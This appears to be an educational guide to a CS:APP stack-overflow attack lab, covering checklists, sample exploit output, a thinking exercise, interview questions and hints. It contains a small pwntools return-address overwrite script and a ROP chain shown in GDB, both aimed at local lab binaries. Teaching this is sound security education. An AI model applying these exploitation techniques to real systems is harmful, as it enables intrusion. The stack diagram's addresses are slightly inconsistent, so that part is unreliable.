10.4 Video Resources

  • LiveOverflow YouTube channel (binary exploitation series)
  • John Hammond CTF walkthroughs
  • GynvaelEN low-level security streams
  • Prerequisites: P4 (Calling Convention), P5 (Bomb Lab)
  • Follow-up: P10 (ELF Link Map) for PLT/GOT understanding
  • Advanced: P17 (Capstone) applies security thinking to real system

11. Self-Assessment Checklist

Understanding

  • I can draw a stack frame and identify buffer, saved RBP, and return address locations
  • I can calculate exact offsets from buffer to return address
  • I can explain why strcpy is dangerous and what safer alternatives exist
  • I understand how shellcode executes on the stack (when NX is disabled)
  • I can explain what ROP is and why it bypasses NX protection
  • I can describe how each mitigation works (canaries, NX, ASLR, RELRO)
  • I understand limitations of each mitigation

Skills

  • I can find the offset from buffer to return address using GDB
  • I can write minimal shellcode for x86-64
  • I can find ROP gadgets in a binary using automated tools
  • I can construct a ROP chain to call a function with arguments
  • I can compile programs with specific mitigations enabled/disabled
  • I can use pwntools (or equivalent) for exploit development

Implementation

  • Completed at least 3 code injection attacks
  • Completed at least 2 ROP attacks
  • Documented all attacks with memory evidence
  • Tested attacks against each individual mitigation
  • Created reproducible exploit scripts

Ethical Understanding

  • I understand the legal boundaries of security research
  • I only practice in isolated, authorized environments
  • I recognize my responsibility to use this knowledge defensively
  • I can articulate the defensive value of understanding attacks

12. Submission / Completion Criteria

Minimum Viable Completion

  • Target 1 (basic overflow) exploited with documentation
  • Target 2 or 3 (code injection) exploited with documentation
  • Target 4 (basic ROP) exploited with documentation
  • Mitigation analysis for at least 2 protections
  • All work in isolated environment

Full Completion

  • All 5 targets exploited
  • Comprehensive mitigation analysis (canary, NX, ASLR, full)
  • All journal entries complete with memory evidence
  • Reproducible exploit scripts for all attacks
  • Clear documentation enabling reproduction

Excellence (Going Above and Beyond)

  • Implemented ASLR bypass technique
  • Explored advanced ROP (SROP, JOP)
  • Completed external CTF challenges (picoCTF, pwnable.kr)
  • Developed custom tooling for analysis
  • Created educational materials (blog post, video, presentation)

13. Real World Outcome

When you complete this project, here is exactly what you will see in your attack lab environment:

$ cd attack-lab
$ ls -la
total 64
drwxr-xr-x  8 user  staff   256 Dec 18 16:30 .
drwxr-xr-x  5 user  staff   160 Dec 18 10:00 ..
drwxr-xr-x  4 user  staff   128 Dec 18 14:00 targets
drwxr-xr-x  6 user  staff   192 Dec 18 16:00 exploits
drwxr-xr-x  4 user  staff   128 Dec 18 16:20 tools
drwxr-xr-x  8 user  staff   256 Dec 18 16:30 journal
-rw-r--r--  1 user  staff  2048 Dec 18 16:30 README.md

$ cat exploits/exploit1.py
#!/usr/bin/env python3
from pwn import *

# Target 1: Basic Stack Smash
offset = 72
win_addr = 0x401156

payload = b"A" * offset
payload += p64(win_addr)

sys.stdout.buffer.write(payload)

$ python3 exploits/exploit1.py | ./targets/target1
You called win()! Attack successful.
Segmentation fault (core dumped)

$ ./targets/target2 < exploits/shellcode_payload.bin
PWNED

$ cat journal/attack1-basic-overflow.md
## Attack #1: Basic Stack Overflow

### Summary
- **Target**: target1 (basic overflow)
- **Vulnerability**: strcpy with no bounds checking
- **Technique**: Return address overwrite
- **Result**: Successfully redirected execution to win()

### Offset Calculation
Using GDB pattern matching:
- Buffer at: 0x7fffffffdc00
- Return address at: 0x7fffffffdc48
- Offset: 72 bytes (64 buffer + 8 saved RBP)

$ gdb ./targets/target4
(gdb) break vulnerable
(gdb) run < exploits/rop_payload.bin
Breakpoint 1, vulnerable () at target4.c:12
(gdb) x/32xg $rsp
0x7fffffffdc00: 0x4141414141414141  0x4141414141414141
...
0x7fffffffdc40: 0x4141414141414141  0x0000000000401234  <-- pop rdi gadget
0x7fffffffdc50: 0x00000000deadbeef  0x0000000000401236  <-- value for rdi, pop rsi
0x7fffffffdc60: 0x00000000cafebabe  0x0000000000401300  <-- value for rsi, win_with_args
(gdb) continue
ROP chain successful!
a = 0xdeadbeef, b = 0xcafebabe

$ perf stat -e branches,branch-misses ./targets/target_canary < exploits/exploit1_payload.bin
*** stack smashing detected ***: terminated

 Performance counter stats for './targets/target_canary':
         1,234,567      branches
            12,345      branch-misses   #    1.00% of all branches

14. The Core Question Youโ€™re Answering

โ€œHow does memory corruption translate into arbitrary code execution, and what defense mechanisms exist to prevent this - and why are they sometimes insufficient?โ€

This question is fundamental to computer security. Youโ€™re learning:

  • The exact mechanics of how writing past a buffer leads to control-flow hijacking
  • Why Cโ€™s lack of bounds checking creates security vulnerabilities
  • How defenders and attackers have co-evolved (NX led to ROP, ASLR led to info leaks)
  • The principle that understanding attacks is essential to building defenses

15. Concepts You Must Understand First

Before starting this project, ensure you understand these concepts:

Concept Where to Learn Why Itโ€™s Needed
Stack Frame Layout CS:APP 3.7 Know where buffer, saved RBP, and return address are located
Calling Convention CS:APP 3.7.2 Understand how arguments are passed and returns work
x86-64 Instructions CS:APP 3.4-3.5 Read and write assembly for shellcode
Little-Endian Byte Order CS:APP 2.1.3 Pack addresses correctly in payloads
Virtual Memory Basics CS:APP 9.1-9.3 Understand why addresses matter and how ASLR works
Compilation Process CS:APP 1.2 Know how source becomes executable and what linker does
System Calls Linux man pages Write shellcode that interacts with the OS

16. Questions to Guide Your Design

As you develop each exploit, ask yourself:

  1. What is the vulnerability? Where exactly is the bounds check missing?
  2. What is the stack layout? How far from your buffer to the return address?
  3. What is my goal? Call a function? Execute shellcode? Chain gadgets?
  4. What constraints exist? Bad characters? Input length limits? Filtering?
  5. What mitigations are active? Is the stack executable? Is ASLR on? Canaries?
  6. How can I verify my payload? What GDB commands will show if itโ€™s correct?
  7. Why does this work? Can I explain every byte of my payload?

17. Thinking Exercise

Before you start coding, work through this exercise on paper:

Given this vulnerable function and stack layout:

void vulnerable(char *input) {
    char buffer[32];
    strcpy(buffer, input);
}
Stack (high addresses at top):
+---------------------------+  0x7fffffffdc48
|     Return Address        |  <- Target to overwrite
+---------------------------+  0x7fffffffdc40
|     Saved RBP             |
+---------------------------+  0x7fffffffdc38
|                           |
|     buffer[32]            |  <- Our input lands here
|                           |
+---------------------------+  0x7fffffffdc18
|     [local vars/padding]  |
+---------------------------+  0x7fffffffdc10 (RSP after prologue)

Questions to answer:

  1. If buffer starts at 0x7fffffffdc18, how many bytes must you write to reach the return address at 0x7fffffffdc48?
  2. If win() is at address 0x401156, write out the complete payload in hex bytes (little-endian).
  3. Why do we write โ€˜Aโ€™ characters before the target address? What are they doing?
  4. If we had a stack canary at 0x7fffffffdc38, what would happen when we try this attack?
  5. If NX is enabled, why canโ€™t we simply inject shellcode into the buffer and jump to it?

Expected answers:

  1. 0x7fffffffdc48 - 0x7fffffffdc18 = 0x30 = 48 bytes
  2. 41 41 41 ... (48 bytes) ... 56 11 40 00 00 00 00 00 (return address in little-endian)
  3. The โ€˜Aโ€™s fill the buffer and saved RBP - theyโ€™re padding to reach the return address
  4. The canary would be overwritten, and before returning, the function would detect this and call __stack_chk_fail, aborting the program
  5. The NX bit marks the stack as non-executable - the CPU will fault if we try to execute from stack addresses

18. The Interview Questions Theyโ€™ll Ask

After completing this project, you should be able to answer these interview questions:

  1. โ€œExplain how a buffer overflow works and how it can lead to code execution.โ€
    • Writing past buffer boundaries overwrites adjacent stack data
    • Return address is stored on stack after local variables
    • By overwriting return address, attacker controls where execution goes after function returns
    • If attacker can inject code (shellcode) and point return to it, they achieve code execution
  2. โ€œWhat is Return-Oriented Programming (ROP) and why is it needed?โ€
    • ROP chains together small instruction sequences (gadgets) ending in ret
    • Needed because NX/DEP prevents executing injected code
    • Reuses existing code in the binary/libraries
    • Each gadget performs small operation, chain achieves complex behavior
  3. โ€œExplain stack canaries and their limitations.โ€
    • Random value placed between buffer and return address
    • Checked before function returns; if modified, program aborts
    • Limitations: can be leaked via format string bugs, doesnโ€™t prevent non-sequential writes
  4. โ€œHow does ASLR work and what are its weaknesses?โ€
    • Randomizes base addresses of stack, heap, libraries, and (with PIE) executable
    • Weaknesses: information leaks reveal addresses, partial overwrites may work, brute force on 32-bit
  5. โ€œWhatโ€™s the difference between code injection and code reuse attacks?โ€
    • Code injection: Attacker provides their own machine code, jumps to it (needs RWX memory)
    • Code reuse: Attacker chains existing code (ROP, ret2libc), works despite NX
    • Code injection simpler but blocked by modern systems; code reuse more complex but bypasses NX
  6. โ€œHow would you write secure code to prevent buffer overflows?โ€
    • Use bounds-checked functions: strncpy, snprintf, fgets
    • Validate all input lengths before copying
    • Enable compiler protections: -fstack-protector-strong -pie -z relro -z now
    • Consider memory-safe languages for new code (Rust, Go)

19. Hints in Layers

If you get stuck, reveal hints one at a time. Try each level before moving to the next.

Hint 1 - Finding the Offset

Use a cyclic pattern (like pwntoolsโ€™ cyclic()) or write a recognizable sequence like โ€œAAAABBBBCCCCโ€ฆโ€. When it crashes, examine what value is in the return address position - this tells you exactly where your overwrite lands.

Hint 2 - Constructing Payloads

Always use struct.pack("<Q", address) or pwntoolsโ€™ p64() to pack addresses. x86-64 is little-endian, so 0x401234 becomes \x34\x12\x40\x00\x00\x00\x00\x00 in memory.

Hint 3 - Debugging Exploits

Set breakpoints at the vulnerable functionโ€™s ret instruction. When you hit it, examine the stack with x/8xg $rsp. The first value should be your target address. If not, your offset is wrong.

Hint 4 - ROP Chains

Start simple: find a pop rdi; ret gadget. Your stack should be: [gadget addr][value for rdi][next addr]. The ret after pop rdi will go to next addr with rdi set to your value.


20. Books That Will Help

Topic Book Chapter/Section
Stack Layout and Calls CS:APP 3e Chapter 3, Section 3.7
Buffer Overflow Basics CS:APP 3e Section 3.10.3-3.10.4
Memory Layout CS:APP 3e Chapter 9
Exploit Development Hacking: Art of Exploitation Chapters 2-3
Shellcode Writing The Shellcoderโ€™s Handbook Chapters 1-5
ROP Techniques โ€œThe Geometry of Innocent Flesh on the Boneโ€ (Shacham, 2007 paper)
Modern Mitigations Practical Binary Analysis Chapter 10
System V ABI x86-64 psABI Document Sections 3.2-3.4

This guide was expanded from CSAPP_3E_DEEP_LEARNING_PROJECTS.md. For the complete learning path, see the project index.

Remember: The goal is to become a better defender. Use this knowledge responsibly.